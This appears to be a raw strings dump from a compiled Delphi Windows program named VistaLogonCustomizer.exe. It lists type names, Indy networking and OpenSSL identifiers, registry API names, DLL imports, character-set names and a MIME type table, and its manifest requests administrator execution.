QTCollectionNotifyEvent<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>
Item-TPair<System.string,System.TypInfo.PTypeInfo>
HTArrayManager<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>g
HTArrayManager<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>
FIEnumerable<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>0!
KTList<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>.TEmptyFunc
LTList<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>.TEnumerator5
LTList<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>.TEnumeratorxB
@TList<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>&
@TList<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>pD
$TComparison<System.TCustomAttribute>
"TComparer<System.TCustomAttribute>2
"TComparer<System.TCustomAttribute>
*TMoveArrayManager<System.TCustomAttribute>g
*TMoveArrayManager<System.TCustomAttribute>0T
&TComparison<System.Rtti.TRttiProperty>
$TComparer<System.Rtti.TRttiProperty>2
$TComparer<System.Rtti.TRttiProperty>dW
,TMoveArrayManager<System.Rtti.TRttiProperty>g
,TMoveArrayManager<System.Rtti.TRttiProperty>
$TComparison<System.Rtti.TRttiMethod>
"TComparer<System.Rtti.TRttiMethod>2
"TComparer<System.Rtti.TRttiMethod>P\
*TMoveArrayManager<System.Rtti.TRttiMethod>g
*TMoveArrayManager<System.Rtti.TRttiMethod>
#TComparison<System.Rtti.TRttiField>
!TComparer<System.Rtti.TRttiField>2
!TComparer<System.Rtti.TRttiField>4a
)TMoveArrayManager<System.Rtti.TRttiField>g
)TMoveArrayManager<System.Rtti.TRttiField>
System.Rtti\@
*TComparison<System.Rtti.TRttiManagedField>
(TComparer<System.Rtti.TRttiManagedField>2
(TComparer<System.Rtti.TRttiManagedField>
0TMoveArrayManager<System.Rtti.TRttiManagedField>g
0TMoveArrayManager<System.Rtti.TRttiManagedField>
System.RttiXA
FTComparison<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>
DTComparer<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>2
DTComparer<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>4k
LTMoveArrayManager<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>g
LTMoveArrayManager<System.Rtti.TPair<System.Pointer,System.Rtti.TRttiObject>>,m
TComparison<System.Pointer>
TComparer<System.Pointer>2
TComparer<System.Pointer>
!TMoveArrayManager<System.Pointer>g
!TMoveArrayManager<System.Pointer>8r
$TComparison<System.Rtti.TRttiObject>
"TComparer<System.Rtti.TRttiObject>2
"TComparer<System.Rtti.TRttiObject>Xu
*TMoveArrayManager<System.Rtti.TRttiObject>g
*TMoveArrayManager<System.Rtti.TRttiObject>
System.RttiD4
FTComparison<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>
DTComparer<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>2
DTComparer<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>\z
LTMoveArrayManager<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>g
LTMoveArrayManager<System.Rtti.TPair<System.TypInfo.PTypeInfo,System.string>>T|
System.Rttih
%TComparison<System.TypInfo.PTypeInfo>
#TComparer<System.TypInfo.PTypeInfo>2
#TComparer<System.TypInfo.PTypeInfo>
 TMoveArrayManager<System.TypInfo.PTypeInfo>g
 TMoveArrayManager<System.TypInfo.PTypeInfo>x
System.Rtti@
TComparison<System.string>
TComparer<System.string>2
TComparer<System.string>
TMoveArrayManager<System.string>g
TMoveArrayManager<System.string>@
FTComparison<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>
DTComparer<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>2
DTComparer<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>|
LTMoveArrayManager<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>g
LTMoveArrayManager<System.Rtti.TPair<System.string,System.TypInfo.PTypeInfo>>t
System.Rtti`
,TDelegatedComparer<System.Rtti.TRttiPackage>8
,TDelegatedComparer<System.Rtti.TRttiPackage>
System.TypInfo
mkOperatorOverload
PFieldExEntry
TFieldExEntry
PVmtMethodExEntry
TVmtMethodExEntry
TPropSet<System.string>V
TPropSet<System.string>x
TPropSet<System.WideString>V
TPropSet<System.WideString>
TPropSet<System.Single>K
TPropSet<System.Single>p
TPropSet<System.Double>K
TPropSet<System.Double>
TPropSet<System.Extended>K
TPropSet<System.Extended>H
TPropSet<System.Comp>K
TPropSet<System.Comp>
TPropSet<System.Currency>K
TPropSet<System.Currency>
TPropSet<System.IInterface>V
TPropSet<System.IInterface>
System.Classes
AOperator
TThread.TSynchronizeRecord
TThread.TSystemTimes
GetCPUUsage
TOperation
TObservers.TCanObserveEvent
TObservers.TObserverAddedEvent
Operation
FOnExecute
OnExecute
TArray<System.IInterface>
TEnumerator<System.IInterface>(
TEnumerator<System.IInterface>
TEnumerable<System.IInterface>-
TEnumerable<System.IInterface>P
!TList<System.IInterface>.arrayofT
IComparer<System.IInterface>
)TCollectionNotifyEvent<System.IInterface>
TArrayManager<System.IInterface>g
TArrayManager<System.IInterface>
IEnumerable<System.IInterface>0!
#TList<System.IInterface>.TEmptyFunc
$TList<System.IInterface>.TEnumerator5
$TList<System.IInterface>.TEnumerator
TList<System.IInterface>&
TList<System.IInterface>
TThreadList<System.IInterface>&
TThreadList<System.IInterface>
&TArray<System.Classes.TCollectionItem>
 TEnumerator<System.Classes.TCollectionItem>(
 TEnumerator<System.Classes.TCollectionItem>
 TEnumerable<System.Classes.TCollectionItem>-
 TEnumerable<System.Classes.TCollectionItem>
.TList<System.Classes.TCollectionItem>.arrayofT
)IComparer<System.Classes.TCollectionItem>
6TCollectionNotifyEvent<System.Classes.TCollectionItem>
-TArrayManager<System.Classes.TCollectionItem>g
-TArrayManager<System.Classes.TCollectionItem>
 IEnumerable<System.Classes.TCollectionItem>0!
0TList<System.Classes.TCollectionItem>.TEmptyFunc
1TList<System.Classes.TCollectionItem>.TEnumerator5
1TList<System.Classes.TCollectionItem>.TEnumerator
%TList<System.Classes.TCollectionItem>&
%TList<System.Classes.TCollectionItem>
TArray<System.TObject>
TEnumerator<System.TObject>(
TEnumerator<System.TObject>
TEnumerable<System.TObject>-
TEnumerable<System.TObject>
TList<System.TObject>.arrayofT
IComparer<System.TObject>
&TCollectionNotifyEvent<System.TObject>
TArrayManager<System.TObject>g
TArrayManager<System.TObject>
IEnumerable<System.TObject>0!
TList<System.TObject>.TEmptyFunc
!TList<System.TObject>.TEnumerator5
!TList<System.TObject>.TEnumerator
TList<System.TObject>&
TList<System.TObject>0
!TArray<System.Classes.TComponent>
&TEnumerator<System.Classes.TComponent>(
&TEnumerator<System.Classes.TComponent>8
&TEnumerable<System.Classes.TComponent>-
&TEnumerable<System.Classes.TComponent>|
)TList<System.Classes.TComponent>.arrayofT
$IComparer<System.Classes.TComponent>
1TCollectionNotifyEvent<System.Classes.TComponent>
(TArrayManager<System.Classes.TComponent>g
(TArrayManager<System.Classes.TComponent>T
&IEnumerable<System.Classes.TComponent>0!
 TList<System.Classes.TComponent>.TEmptyFunc
,TList<System.Classes.TComponent>.TEnumerator5
,TList<System.Classes.TComponent>.TEnumeratorL
TList<System.Classes.TComponent>&
TList<System.Classes.TComponent>
3TPair<System.Integer,System.Classes.IInterfaceList>
JTArray<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
OTEnumerator<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>(
OTEnumerator<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
OTEnumerable<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>-
OTEnumerable<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
?TDictionary<System.Integer,System.Classes.IInterfaceList>.TItem
DTDictionary<System.Integer,System.Classes.IInterfaceList>.TItemArray
!IEqualityComparer<System.Integer>
&TCollectionNotifyEvent<System.Integer>
5TCollectionNotifyEvent<System.Classes.IInterfaceList>
TEnumerator<System.Integer>(
TEnumerator<System.Integer>
TEnumerable<System.Integer>-
TEnumerable<System.Integer><
HTDictionary<System.Integer,System.Classes.IInterfaceList>.TKeyEnumerator;
HTDictionary<System.Integer,System.Classes.IInterfaceList>.TKeyEnumerator
HTDictionary<System.Integer,System.Classes.IInterfaceList>.TKeyCollection;
HTDictionary<System.Integer,System.Classes.IInterfaceList>.TKeyCollection|
%TArray<System.Classes.IInterfaceList>
*TEnumerator<System.Classes.IInterfaceList>(
*TEnumerator<System.Classes.IInterfaceList>
*TEnumerable<System.Classes.IInterfaceList>-
*TEnumerable<System.Classes.IInterfaceList>4
JTDictionary<System.Integer,System.Classes.IInterfaceList>.TValueEnumerator;
JTDictionary<System.Integer,System.Classes.IInterfaceList>.TValueEnumerator
JTDictionary<System.Integer,System.Classes.IInterfaceList>.TValueCollection;
JTDictionary<System.Integer,System.Classes.IInterfaceList>.TValueCollection
ITDictionary<System.Integer,System.Classes.IInterfaceList>.TPairEnumerator;
ITDictionary<System.Integer,System.Classes.IInterfaceList>.TPairEnumerator
9TDictionary<System.Integer,System.Classes.IInterfaceList>9
9TDictionary<System.Integer,System.Classes.IInterfaceList>
'TArray<System.Classes.TBasicActionLink>
,TEnumerator<System.Classes.TBasicActionLink>(
,TEnumerator<System.Classes.TBasicActionLink>
,TEnumerable<System.Classes.TBasicActionLink>-
,TEnumerable<System.Classes.TBasicActionLink>
/TList<System.Classes.TBasicActionLink>.arrayofT
*IComparer<System.Classes.TBasicActionLink>
7TCollectionNotifyEvent<System.Classes.TBasicActionLink>
.TArrayManager<System.Classes.TBasicActionLink>g
.TArrayManager<System.Classes.TBasicActionLink>
,IEnumerable<System.Classes.TBasicActionLink>0!
1TList<System.Classes.TBasicActionLink>.TEmptyFunc
2TList<System.Classes.TBasicActionLink>.TEnumerator5
2TList<System.Classes.TBasicActionLink>.TEnumerator$&
&TList<System.Classes.TBasicActionLink>&
&TList<System.Classes.TBasicActionLink>
4TPair<System.string,System.Classes.TPersistentClass>
KTArray<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
PTEnumerator<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>(
PTEnumerator<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
PTEnumerable<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>-
PTEnumerable<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>tA
@TDictionary<System.string,System.Classes.TPersistentClass>.TItem
ETDictionary<System.string,System.Classes.TPersistentClass>.TItemArray
7TCollectionNotifyEvent<System.Classes.TPersistentClass>
ITDictionary<System.string,System.Classes.TPersistentClass>.TKeyEnumerator;
ITDictionary<System.string,System.Classes.TPersistentClass>.TKeyEnumerator
ITDictionary<System.string,System.Classes.TPersistentClass>.TKeyCollection;
ITDictionary<System.string,System.Classes.TPersistentClass>.TKeyCollection
'TArray<System.Classes.TPersistentClass>
,TEnumerator<System.Classes.TPersistentClass>(
,TEnumerator<System.Classes.TPersistentClass>lI
,TEnumerable<System.Classes.TPersistentClass>-
,TEnumerable<System.Classes.TPersistentClass>
KTDictionary<System.string,System.Classes.TPersistentClass>.TValueEnumerator;
KTDictionary<System.string,System.Classes.TPersistentClass>.TValueEnumerator L
KTDictionary<System.string,System.Classes.TPersistentClass>.TValueCollection;
KTDictionary<System.string,System.Classes.TPersistentClass>.TValueCollection N
JTDictionary<System.string,System.Classes.TPersistentClass>.TPairEnumerator;
JTDictionary<System.string,System.Classes.TPersistentClass>.TPairEnumeratorLP
:TDictionary<System.string,System.Classes.TPersistentClass>9
:TDictionary<System.string,System.Classes.TPersistentClass>LR
KeysLO
/TList<System.Classes.TPersistentClass>.arrayofT
*IComparer<System.Classes.TPersistentClass>
.TArrayManager<System.Classes.TPersistentClass>g
.TArrayManager<System.Classes.TPersistentClass>
,IEnumerable<System.Classes.TPersistentClass>0!
1TList<System.Classes.TPersistentClass>.TEmptyFunc
2TList<System.Classes.TPersistentClass>.TEnumerator5
2TList<System.Classes.TPersistentClass>.TEnumerator
&TList<System.Classes.TPersistentClass>&
&TList<System.Classes.TPersistentClass>
TArray<System.Classes.TRegGroup>
%TEnumerator<System.Classes.TRegGroup>(
%TEnumerator<System.Classes.TRegGroup>
%TEnumerable<System.Classes.TRegGroup>-
%TEnumerable<System.Classes.TRegGroup>
(TList<System.Classes.TRegGroup>.arrayofT
System.Generics.CollectionsD9
#IComparer<System.Classes.TRegGroup>
0TCollectionNotifyEvent<System.Classes.TRegGroup>
'TArrayManager<System.Classes.TRegGroup>g
'TArrayManager<System.Classes.TRegGroup>
%IEnumerable<System.Classes.TRegGroup>0!
*TList<System.Classes.TRegGroup>.TEmptyFunc
 TList<System.Classes.TRegGroup>.TEnumerator5
 TList<System.Classes.TRegGroup>.TEnumerator
TList<System.Classes.TRegGroup>&
TList<System.Classes.TRegGroup>
%TObjectList<System.Classes.TRegGroup><
%TObjectList<System.Classes.TRegGroup>d
TArray<System.Classes.TIntConst>
%TEnumerator<System.Classes.TIntConst>(
%TEnumerator<System.Classes.TIntConst>
%TEnumerable<System.Classes.TIntConst>-
%TEnumerable<System.Classes.TIntConst>
(TList<System.Classes.TIntConst>.arrayofT
#IComparer<System.Classes.TIntConst>
0TCollectionNotifyEvent<System.Classes.TIntConst>
'TArrayManager<System.Classes.TIntConst>g
'TArrayManager<System.Classes.TIntConst>
%IEnumerable<System.Classes.TIntConst>0!
*TList<System.Classes.TIntConst>.TEmptyFunc
 TList<System.Classes.TIntConst>.TEnumerator5
 TList<System.Classes.TIntConst>.TEnumerator
TList<System.Classes.TIntConst>&
TList<System.Classes.TIntConst>d
%TThreadList<System.Classes.TIntConst>&
%TThreadList<System.Classes.TIntConst><
TList.Sort$1846$0$Intf
TList.Sort$1846$ActRec
!TArray<System.Classes.TPropFixup>
&TEnumerator<System.Classes.TPropFixup>(
&TEnumerator<System.Classes.TPropFixup>
&TEnumerable<System.Classes.TPropFixup>-
&TEnumerable<System.Classes.TPropFixup>
)TList<System.Classes.TPropFixup>.arrayofT
$IComparer<System.Classes.TPropFixup>
1TCollectionNotifyEvent<System.Classes.TPropFixup>
(TArrayManager<System.Classes.TPropFixup>g
(TArrayManager<System.Classes.TPropFixup>
&IEnumerable<System.Classes.TPropFixup>0!
 TList<System.Classes.TPropFixup>.TEmptyFunc
,TList<System.Classes.TPropFixup>.TEnumerator5
,TList<System.Classes.TPropFixup>.TEnumerator
TList<System.Classes.TPropFixup>&
TList<System.Classes.TPropFixup>d
&TThreadList<System.Classes.TPropFixup>&
&TThreadList<System.Classes.TPropFixup><
TComponent.Create@$2648$0$Intf
&TComparison<System.Classes.TComponent>
$TComparer<System.Classes.TComponent>2
$TComparer<System.Classes.TComponent>
-TDelegatedComparer<System.Classes.TComponent>8
-TDelegatedComparer<System.Classes.TComponent>
TComponent.Create@$2648$ActRec
#TComponent.GetObservers$2660$0$Intf
#TComponent.GetObservers$2660$1$Intf
#TComponent.GetObservers$2660$ActRec
#TComponent.GetObservers$2660$ActRecX
TComparison<System.IInterface>
TComparer<System.IInterface>2
TComparer<System.IInterface>h!
$TMoveArrayManager<System.IInterface>g
$TMoveArrayManager<System.IInterface>
 TComparison<System.Classes.TCollectionItem>
)TComparer<System.Classes.TCollectionItem>2
)TComparer<System.Classes.TCollectionItem>@&
1TMoveArrayManager<System.Classes.TCollectionItem>g
1TMoveArrayManager<System.Classes.TCollectionItem>
TComparison<System.TObject>
TComparer<System.TObject>2
TComparer<System.TObject>< 
!TMoveArrayManager<System.TObject>g
!TMoveArrayManager<System.TObject>
,TMoveArrayManager<System.Classes.TComponent>g
,TMoveArrayManager<System.Classes.TComponent>@/
RTList<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>.arrayofT
MIComparer<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
ZTCollectionNotifyEvent<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
Item3TPair<System.Integer,System.Classes.IInterfaceList>
QTArrayManager<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>g
QTArrayManager<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
OIEnumerable<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>0!
TTList<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>.TEmptyFunc
UTList<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>.TEnumerator5
UTList<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>.TEnumerator|7
ITList<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>&
ITList<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
TList<System.Integer>.arrayofT
IComparer<System.Integer>
TArrayManager<System.Integer>g
TArrayManager<System.Integer>
IEnumerable<System.Integer>0!
TList<System.Integer>.TEmptyFunc
!TList<System.Integer>.TEnumerator5
!TList<System.Integer>.TEnumerator`J
TList<System.Integer>&
TList<System.Integer>
-TList<System.Classes.IInterfaceList>.arrayofT
System.Generics.Collectionst
(IComparer<System.Classes.IInterfaceList>
,TArrayManager<System.Classes.IInterfaceList>g
,TArrayManager<System.Classes.IInterfaceList>
*IEnumerable<System.Classes.IInterfaceList>0!
/TList<System.Classes.IInterfaceList>.TEmptyFunc
0TList<System.Classes.IInterfaceList>.TEnumerator5
0TList<System.Classes.IInterfaceList>.TEnumerator
$TList<System.Classes.IInterfaceList>&
$TList<System.Classes.IInterfaceList>X^
,TComparison<System.Classes.TBasicActionLink>
*TComparer<System.Classes.TBasicActionLink>2
*TComparer<System.Classes.TBasicActionLink>8l
2TMoveArrayManager<System.Classes.TBasicActionLink>g
2TMoveArrayManager<System.Classes.TBasicActionLink>
STList<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>.arrayofT
System.Generics.Collectionsp>
NIComparer<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
[TCollectionNotifyEvent<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
Item4TPair<System.string,System.Classes.TPersistentClass>
RTArrayManager<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>g
RTArrayManager<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
PIEnumerable<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>0!
UTList<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>.TEmptyFunc
VTList<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>.TEnumerator5
VTList<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>.TEnumeratorHv
JTList<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>&
JTList<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>Tx
,TComparison<System.Classes.TPersistentClass>
*TComparer<System.Classes.TPersistentClass>2
*TComparer<System.Classes.TPersistentClass>
2TMoveArrayManager<System.Classes.TPersistentClass>g
2TMoveArrayManager<System.Classes.TPersistentClass>@
9.TList`1.Pack$697$0$Intf<System.Classes.TPersistentClass>
9@TList`1.Pack$697$ActRec<System.Classes.TPersistentClass>
9@TList`1.Pack$697$ActRec<System.Classes.TPersistentClass>l
%TComparison<System.Classes.TRegGroup>
#TComparer<System.Classes.TRegGroup>2
#TComparer<System.Classes.TRegGroup>|
 TMoveArrayManager<System.Classes.TRegGroup>g
 TMoveArrayManager<System.Classes.TRegGroup>,
System.ClassesD9
%TComparison<System.Classes.TIntConst>
#TComparer<System.Classes.TIntConst>2
#TComparer<System.Classes.TIntConst>d
 TMoveArrayManager<System.Classes.TIntConst>g
 TMoveArrayManager<System.Classes.TIntConst>
&TComparison<System.Classes.TPropFixup>
$TComparer<System.Classes.TPropFixup>2
$TComparer<System.Classes.TPropFixup>L
,TMoveArrayManager<System.Classes.TPropFixup>g
,TMoveArrayManager<System.Classes.TPropFixup>
OTComparison<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>
MTComparer<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>2
MTComparer<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>h
UTMoveArrayManager<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>g
UTMoveArrayManager<System.Classes.TPair<System.Integer,System.Classes.IInterfaceList>>p
TComparison<System.Integer>
TComparer<System.Integer>2
TComparer<System.Integer>
!TMoveArrayManager<System.Integer>g
!TMoveArrayManager<System.Integer>
*TComparison<System.Classes.IInterfaceList>
(TComparer<System.Classes.IInterfaceList>2
(TComparer<System.Classes.IInterfaceList>
0TMoveArrayManager<System.Classes.IInterfaceList>g
0TMoveArrayManager<System.Classes.IInterfaceList>|
System.Classest
PTComparison<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
NTComparer<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>2
NTComparer<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
VTMoveArrayManager<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>g
VTMoveArrayManager<System.Classes.TPair<System.string,System.Classes.TPersistentClass>>
System.Classesp>
AMsg
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange\
EIdInvalidPortRange
CheckIPVersionSupport
VPort
APort
WSGetServByPort
APortNumber
AddServByPortToList
IdStackWindows
TIdSocketListWindows4
TIdSocketListWindows
TIdStackWindowsg
ReceiveMsg
WSTranslateSocketErrorMsg
SupportsIPv6
TIdStackWindows
EIdIPVersionUnsupported
FSourcePort
FDestPort
SourcePort
DestPort
EIdPortRequired
EIdTCPConnectionError`q
EIdTCPConnectionError4q
EIdObjectTypeNotSupported$r
EIdObjectTypeNotSupported
IPAsStringSV
System.Win.Registry
TRegKeyInfo
NumSubKeys
MaxSubKeyLen
FCurrentKey
FRootKey
FCloseRootKey
CloseKey
CreateKey
DeleteKey
GetKeyInfo
GetKeyNames
HasSubKeys
KeyExists
LoadKey
MoveKey
OpenKey
OpenKeyReadOnly
ReplaceKey
RestoreKey
SaveKey
UnLoadKey
CurrentKey
LastErrorMsg
RootKey
RootKeyName
QuoteHTTP
Password
IdHTTPHeaderInfo
FPassword
FPort
ProxyPassword
ProxyPort
TIdMetaHTTPEquivE
ProcessMetaHTTPEquiv
TIdMetaHTTPEquiv0^
ftpTransfer
ftpReady
ftpAborted
VMsgEnd
Port
FClientPortMin
FClientPortMax
FPeerPort
ClientPortMin
ClientPortMax
PeerPort
"EIdTransparentProxyUDPNotSupported
OpenUDP
CloseUDP
RecvFromUDP
VPeerPort
SendToUDP
Portt
FLastCmdResult
TIdTCPConnectionB
RaiseExceptionForLastCmdResult
SendCmd
TIdTCPConnection
IdTCPConnection
LastCmdResult
FBoundPort
FBoundPortMax
FBoundPortMin
TIdTCPClientCustom'
TIdTCPClientCustom
IdTCPClient
BoundPort
BoundPortMax
BoundPortMin
TIdTCPClient
TIdTCPClient4W
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
FUDPSocksAssociation
FDefaultPort
DefaultPortt
TerminatingExceptionClassH
fPassThrough
PassThrough
MakeFTPSvrPort
MakeFTPSvrPasv
FURL
ServerClassH
CompressFTPDeflate
CompressFTPToIO
DecompressFTPFromIO
DecompressFTPDeflate
CompressHTTPDeflate
DecompressHTTPDeflate
URLDecode
URLEncode
FHttpOnly
HttpOnly
AURL
EIdUnsupportedOperation
EIdUnsupportedTransfer
EIdUnsupportedTransfer`S
EIdUnsupportedEncoding
EIdUnsupportedEncoding(T
rsa_keygen
dsa_keygen
pub_key
priv_key
PEVP_PKEYt}
EVP_PKEY_union
EVP_PKEY
pkey
pkey_type
required_pkey_type
key_len
key_length
AUTHORITY_KEYID
keyid
PAUTHORITY_KEYIDT
X509_PUBKEY
public_key
PX509_PUBKEY<
X509_CERT_AUX
PX509_CERT_AUX
cert_info
ex_nscert
get_cert_methods
cert_crl
lookup_certs
ppem_password_cb
algorithm_mkey
key_arg_length
key_arg
master_key_length
master_key
sess_cert
login
Ptlsext_ticket_key_cbQ
cert_store
default_passwd_callback
default_passwd_callback_userdata
client_cert_cb
extra_certs
max_cert_list
cert
msg_callback
msg_callback_arg
client_cert_engine
tlsext_tick_key_name
tlsext_tick_hmac_key
tlsext_tick_aes_key
tlsext_ticket_key_cb
init_msg
read_key
write_key
key_material_length
key_material
tmp_cert_type
tmp_cert_length
tmp_cert_verify_md
tmp_cert_req
tmp_key_block_length
tmp_key_block
new_mac_pkey_type
tmp_cert_request
msg_len
w_msg_hdr
r_msg_hdr
sslvrfFailIfNoPeerCert
TCallbackExEvent
TPasswordEvent
TPasswordEventEx
VPassword
Certificate
fsRootCertFile
fsCertFile
fsKeyFile
RootCertFile
CertFile
KeyFile
LoadRootCert
LoadCert
fPeerCert
PeerCertLZ
fOnGetPassword
fOnGetPasswordEx
OnGetPassword
OnGetPasswordExL6
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertErrorD_
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
SEC_GET_KEY_FN
KeyVer
pGetKeyFn
pvGetKeyArgument
CHANGE_PASSWORD_FN_W
pszOldPassword
pszNewPassword
EXPORT_SECURITY_CONTEXT_FN
IMPORT_SECURITY_CONTEXT_FN_W
ExportSecurityContext
ImportSecurityContextW
ChangeAccountPasswordW
aPassword
TIdHTTPWhatsNext
wnGoToURL
IdHTTP
TIdHTTPConnectionType
TIdHTTPOption
hoNoParseMetaHTTPEquiv
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
FHTTP
FMetaHTTPEquiv
TIdHTTPResponse5
AHTTP
TIdHTTPResponse
MetaHTTPEquiv
TIdHTTPRequest5
TIdHTTPRequest$@
TIdHTTPProtocol;
TIdHTTPProtocol
FHTTPProto
TIdCustomHTTP'
TIdCustomHTTP
MetaHTTPEquiv8
HTTPOptions
TIdHTTP
TIdHTTP|T
EIdHTTPProtocolExceptionn
EIdHTTPProtocolException
System.Win.ComObj
System.Internal.ExcUtils
System.SysConst
System.Character
Winapi.Windows
System.UITypes
System.RTLConsts
Winapi.PsAPI
Winapi.SHFolder
Winapi.ImageHlp
System.VarUtils
System.Math
System.Diagnostics
System.TimeSpan
Winapi.Messages
System.AnsiStrings
System.StrUtils
Winapi.ActiveX
System.Win.ComConst
Winapi.ShlObj
Winapi.MSXMLIntf
Winapi.StructuredQueryCondition
Winapi.PropSys
Winapi.ObjectArray
Winapi.UrlMon
Winapi.WinInet
Winapi.RegStr
Winapi.ShellAPI
Winapi.IpExport
Winapi.Winsock2
Winapi.Qos
Winapi.CommCtrl
System.DateUtils
System.IniFiles
System.IOUtils
System.Masks
IdTCPServer
IdCustomTCPServer
#!V!W!"!&!r%!%#%%%'%)%c%e%g%C%<!"%$%&%(%*% %-%/%1%3%5%7%9%;$=%?%A%D%F%H%J%K%L%M%N%O%R%U%X%[%^%_%`%a%b%d%f%h%i%j%k%l%m%o%s% !,!
P%S%V%Y%\%
?456789:;<=
!"#$%&'()* ,-./0123
oleaut32.dll
advapi32.dll
RegOpenKeyExW
RegCloseKey
user32.dll
kernel32.dll
GetConsoleOutputCP
MsgWaitForMultipleObjects
GetCPInfoExW
GetCPInfo
RegQueryInfoKeyW
RegFlushKey
RegEnumKeyExW
ole32.dll
shell32.dll
ShellExecuteExW
ShellExecuteW
0IdHTTPHeaderInfo
dSystem.SysConst
%System.Classes
,System.Character
ISystem.Internal.ExcUtils
kWinapi.PsAPI
-Winapi.ImageHlp
fSystem.Rtti
YSystem.AnsiStrings
System.StrUtils
&System.DateUtils
iSystem.IOUtils
 IdTCPServer
4Winapi.RegStr
hWinapi.UrlMon
<assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="VistaLogonCustomizer.exe" type="*"/>
<description>elevate execution level</description>
<requestedExecutionLevel level="requireAdministrator"/>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="*"/>
Kernel32.dll
8.iteu
%s-%s
operator
%s[%d]
.Owner
%s, %.2d %s %.4d %s %s
%s, %.2d%s%s%s%.4d %s %s
WS2_32.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
MSWSOCK.DLL
WSARecvMsg
WSASendMsg
Wship6.dll
Fwpuclnt.dll
IdnDL.dll
Normaliz.dll
127.0.0.1
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.irv:1983
csISO16Portuguese
csISO84Portuguese2
windows-936
csShiftJIS
windows-874
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csMicrosoftPublishing
Windows-31J
csWindows31J
PTCP154
csPTCP154
windows-1250
windows-1251
windows-1252
windows-1253
windows-1254
windows-1255
windows-1256
windows-1257
windows-1258
10.6.0.4975
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
0123456789
!"#$%&'()* ,-./;<=>?@[\]^_`{|}~
.nml=animation/narrative
.aac=audio/mp4
.aif=audio/x-aiff
.aifc=audio/x-aiff
.aiff=audio/x-aiff
.au=audio/basic
.gsm=audio/x-gsm
.kar=audio/midi
.m3u=audio/mpegurl
.mid=audio/midi
.midi=audio/midi
.mpega=audio/x-mpg
.mp2=audio/x-mpg
.mp3=audio/x-mpg
.mpga=audio/x-mpg
.m3u=audio/x-mpegurl
.pls=audio/x-scpls
.qcp=audio/vnd.qcelp
.ra=audio/x-realaudio
